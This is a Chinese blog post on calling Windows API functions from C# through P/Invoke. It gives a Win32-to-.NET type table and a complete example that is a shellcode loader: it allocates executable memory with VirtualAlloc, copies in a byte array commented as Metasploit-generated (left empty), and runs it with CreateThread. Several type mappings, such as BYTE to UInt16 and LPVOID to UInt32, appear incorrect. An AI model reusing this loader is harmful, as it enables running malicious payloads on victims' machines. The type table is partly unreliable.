c# 调用Windows API - nice_0e3
2022-9-6 14:8:0 Author: www.cnblogs.com(查看原文) 阅读量:14 收藏

前言

看点代码安抚浮躁的心

对应表

API数据类型 Windows API时的数据类型
BOOL System.Int32
BOOLEAN System.Int32
BYTE System.UInt16
COLORREF System.UInt32
DWORD System.UInt32
DWORD32 System.UInt32
DWORD64 System.UInt64
FLOAT System.Float
HACCEL System.IntPtr
HANDLE System.IntPtr
HBITMAP System.IntPtr
HBRUSH System.IntPtr
HCONV System.IntPtr
HCONVLIST System.IntPtr
HCURSOR System.IntPtr
HDC System.IntPtr
HDDEDATA System.IntPtr
HDESK System.IntPtr
HDROP System.IntPtr
HDWP System.IntPtr
HENHMETAFILE System.IntPtr
HFILE System.IntPtr
HFONT System.IntPtr
HGDIOBJ System.IntPtr
HGLOBAL System.IntPtr
HHOOK System.IntPtr
HICON System.IntPtr
HIMAGELIST System.IntPtr
HIMC System.IntPtr
HINSTANCE System.IntPtr
HKEY System.IntPtr
HLOCAL System.IntPtr
HMENU System.IntPtr
HMETAFILE System.IntPtr
HMODULE System.IntPtr
HMONITOR System.IntPtr
HPALETTE System.IntPtr
HPEN System.IntPtr
HRGN System.IntPtr
HRSRC System.IntPtr
HSZ System.IntPtr
HWINSTA System.IntPtr
HWND System.IntPtr
INT System.Int32
INT32 System.Int32
INT64 System.Int64
LONG System.Int32
LONG32 System.Int32
LONG64 System.Int64
LONGLONG System.Int64
LPARAM System.IntPtr
LPBOOL System.Int16[]
LPBYTE System.UInt16[]
LPCOLORREF System.UInt32[]
LPCSTR System.String
LPCTSTR System.String
LPCVOID System.UInt32
LPCWSTR System.String
LPDWORD System.UInt32[]
LPHANDLE System.UInt32
LPINT System.Int32[]
LPLONG System.Int32[]
LPSTR System.String
LPTSTR System.String
LPVOID System.UInt32
LPWORD System.Int32[]
LPWSTR System.String
LRESULT System.IntPtr
PBOOL System.Int16[]
PBOOLEAN System.Int16[]
PBYTE System.UInt16[]
PCHAR System.Char[]
PCSTR System.String
PCTSTR System.String
PCWCH System.UInt32
PCWSTR System.UInt32
PDWORD System.Int32[]
PFLOAT System.Float[]
PHANDLE System.UInt32
PHKEY System.UInt32
PINT System.Int32[]
PLCID System.UInt32
PLONG System.Int32[]
PLUID System.UInt32
PSHORT System.Int16[]
PSTR System.String
PTBYTE System.Char[]
PTCHAR System.Char[]
PTSTR System.String
PUCHAR System.Char[]
PUINT System.UInt32[]
PULONG System.UInt32[]
PUSHORT System.UInt16[]
PVOID System.UInt32
PWCHAR System.Char[]
PWORD System.Int16[]
PWSTR System.String
REGSAM System.UInt32
SC_HANDLE System.IntPtr
SC_LOCK System.IntPtr
SHORT System.Int16
SIZE_T System.UInt32
SSIZE_ System.UInt32
TBYTE System.Char
TCHAR System.Char
UCHAR System.Byte
UINT System.UInt32
UINT32 System.UInt32
UINT64 System.UInt64
ULONG System.UInt32
ULONG32 System.UInt32
ULONG64 System.UInt64
ULONGLONG System.UInt64
USHORT System.UInt16
WORD System.UInt16
WPARAM System.IntPtr
LPTHREAD_START_ROUTINE UInt32
LPSECURITY_ATTRIBUTES LPSECURITY_ATTRIBUTES

案例1

[DllImport("kernel32", EntryPoint = "VirtualAlloc")] //导入kernel32.dll,VirtualAlloc函数
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);//声明win32 API函数

...
//调用
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

//或者可以写成这样

  private static UInt32 MEM_COMMIT = 0x1000;
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修饰符用于声明在外部实现的方法。 extern 修饰符的常见用法是在使用 Interop 服务调入非托管代码时与 DllImport 特性一起使用。在这种情况下,还必须将方法声明为 static

完整代码

    static void Main(string[] args)
        {
            // native function’s compiled code
            // generated with metasploit
            byte[] shellcode = new byte[892] {  };
           
            
            
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")] 
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
  }

}

文章来源: https://www.cnblogs.com/nice0e3/p/16661576.html
如有侵权请联系:admin#unsafe.sh